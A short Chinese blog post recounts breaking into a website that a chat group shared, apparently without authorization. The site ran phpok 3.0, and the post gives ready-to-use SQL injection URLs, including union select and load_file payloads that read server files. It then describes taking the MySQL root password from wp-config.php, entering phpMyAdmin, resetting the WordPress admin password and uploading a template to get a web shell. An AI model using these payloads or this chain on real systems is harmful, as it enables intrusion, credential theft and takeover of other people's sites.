由phpok3.0的渗透

群里丢出来一个站,用的不知名(或者我不知道)的程序,伪静态,旁站有三四个,子目录下有个wordpress程序,不过似乎模板有点问题爆出来路径了,旁站是一个phpok 3.0的程序,我也没用过,网上有一些漏洞文章,一开始用工具爬出来一个注入:

http://www.xxxxx.com/index.php?langid=en

不过回显很蛋疼,看群里有人已经爆出来能直接回显的注入点,我就又搜索了下,看到这个:

http://www.xxxxx.com/index.php?c=open&f=ajax_preview_img&idstring=0) union select 1,version()%23

回显非常清晰:

读取文件"C:\boot.ini":

http://www.xxxxx.com/index.php?c=open&f=ajax_preview_img&idstring=0)%20union%20select%201,load_file(0x633A5C626F6F742E696E69)%23

刚开始的时候爆的路径,读了wordpress的"wp-config.php"文件获取到mysql账户密码(root),然后真好还有个phpmyadmin,进去之后修改wordpress账户密码,进wordpress后台传模板拿shell。

转载请注明: 本文《由phpok3.0的渗透》来源于bstaint的博客

没有评论: